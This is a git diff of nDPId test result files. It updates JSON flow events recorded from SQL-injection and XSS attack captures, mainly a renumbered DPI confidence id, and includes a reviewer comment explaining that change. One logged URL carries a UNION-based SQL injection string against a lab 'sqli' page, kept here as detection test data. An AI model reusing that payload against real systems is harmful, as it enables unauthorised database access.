-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
-00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348514064,"flow_last_seen":1499348514065,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":1499348514065,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/sqli\/?id=1%27+and+1%3D1+union+select+null%2C+table_name+from+information_schema.tables%23&Submit=Submit","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00806{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"thread_ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","packets-captured":94,"packets-processed":94,"total-skipped-flows":0,"total-l4-payload-len":23660,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":57,"global_ts_msec":1499348519077} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 94/94 @@ -63,9 +63,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882611 bytes -~~ total memory freed........: 5882611 bytes -~~ total allocations/frees...: 118285/118285 +~~ total memory allocated....: 6016245 bytes +~~ total memory freed........: 6016245 bytes +~~ total allocations/frees...: 121047/121047 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1075 chars diff --git a/test/results/WebattackXSS.pcap.out b/test/results/WebattackXSS.pcap.out index 2dfb5beb5..7d3c8d263 100644 --- a/test/results/WebattackXSS.pcap.out +++ b/test/results/WebattackXSS.pcap.out 
@@ -4,7 +4,7 @@ 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"} 
-00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="} 
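Review bot: The numeric key under `confidence` changes from `4` to `6` in this `detected` event while the label stays `DPI`, so the id is evidently not stable across libnDPI revisions. Any consumer of the nDPId JSON stream that filters or alerts on the numeric id rather than the label would stop matching DPI-confirmed flows after this bump, without an error. The same renumbering is the only change in the other WebattackXSS.pcap.out hunks and in the `end` events of WebattackSQLinj.pcap.out. The commit message could carry a line such as `confidence ids renumbered upstream (DPI: 4 -> 6); match on the name, not the id`, and the event schema, if the project ships one, should not pin the id.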
@@ -21,7 +21,7 @@ 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"} 
-00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"thread_ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="} 
@@ -38,7 +38,7 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="} 